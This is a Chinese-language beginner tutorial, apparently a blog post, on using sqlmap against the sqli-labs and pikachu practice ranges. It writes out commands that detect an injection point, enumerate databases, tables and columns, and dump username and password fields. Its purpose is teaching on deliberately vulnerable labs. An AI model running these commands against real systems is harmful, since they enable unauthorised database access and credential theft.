前言:
Sqlmap我想大部分都很熟悉,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞,任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入和自动工具注入,而sqlmap就是自动工具中最好用的工具。那么直接进入主题。
这里我们使用靶场sql-lab和pikachu
代码语言:javascript复制http://wangehacker.cn/thanks.html
靶场提供在我们的官网上,免费使用,免去一些新手的烦恼。
正文:
一、基本使用方式
首先我们要了解一下我们正常的注入的一个命令流程,我这里先演示最基本的一套流程
1、检测目标地址是否存在注入点。
这里使用的地址是我们网站的
代码语言:javascript复制http://wangehacker.cn/sqli-labs/Less-1/
这里我们需要在后面加上?id=1的传参
这里我们将这个网址直接扔到sqlmap中运行检测
s
代码语言:javascript复制qlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch
解释--batch是后面有一些选项我们选择默认选项
这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分
python sqlmap.py -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch
这里就代表存在着注入漏洞,我们就需要进行下一步步骤,我们扫库名
2、检测数据库中的库名
我们使用命令
代码语言:javascript复制sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch --dbs
3、选择需要爆的库开始爆表名
使用命令选择我们需要爆破的库名,开始爆库中的表
代码语言:javascript复制sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu --tables
这里我们顺利拿到表名
4、指定库名,表名爆破字段
使用命令:
代码语言:javascript复制sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users --columns
5、选择字段爆破字段中的内容
使用命令:
代码语言:javascript复制sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users -C username,password --dump
这里我们的sqlmap会对一些简单的md5加密值进行破解。到这里五步我们的基本使用方式就已经完成了,下面我们利用pikachu靶场练习不同类型的注入。